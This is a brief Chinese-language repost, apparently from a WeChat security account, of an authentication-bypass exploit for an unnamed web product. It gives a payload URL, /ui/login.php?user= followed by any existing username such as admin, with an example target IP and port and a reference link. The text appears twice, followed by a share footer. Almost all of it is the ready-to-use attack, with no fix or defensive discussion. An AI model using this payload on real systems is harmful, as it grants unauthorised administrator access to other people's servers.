payload: https://ip/ui/login.php?user= 用户名随便写
例如: https://123.123.123.123:5000/ui/login.php?user=admin
只要用户名存在,比如管理员
如下图:
[参考链接]
https://www.yuque.com/pmiaowu/hcy2bz/fp4icw?from=groupmessage
转自:黑白之道
漏洞细节:
payload: https://ip/ui/login.php?user= 用户名随便写
例如: https://123.123.123.123:5000/ui/login.php?user=admin
只要用户名存在,比如管理员
如下图:
[参考链接]
https://www.yuque.com/pmiaowu/hcy2bz/fp4icw?from=groupmessage
转自:黑白之道
微信扫一扫分享